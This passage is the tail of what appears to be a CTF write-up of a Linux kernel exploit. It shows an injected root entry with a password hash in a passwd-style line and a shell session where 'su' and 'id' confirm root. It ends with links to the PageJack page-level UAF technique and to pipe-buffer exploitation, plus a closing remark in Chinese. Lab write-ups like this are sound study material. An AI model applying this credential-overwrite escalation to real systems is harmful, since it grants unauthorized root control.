root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh:/home/ctf:/bin/sh
~ $ su
Password:
/ # id
uid=0(root) gid=0(root) groups=0(root)
*/
```
## pagejack
https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf
## after all
再次感受到 kernel 裡面記憶體 1 bit 改變都會有很大的影響XD
## others
https://www.interruptlabs.co.uk/articles/pipe-buffer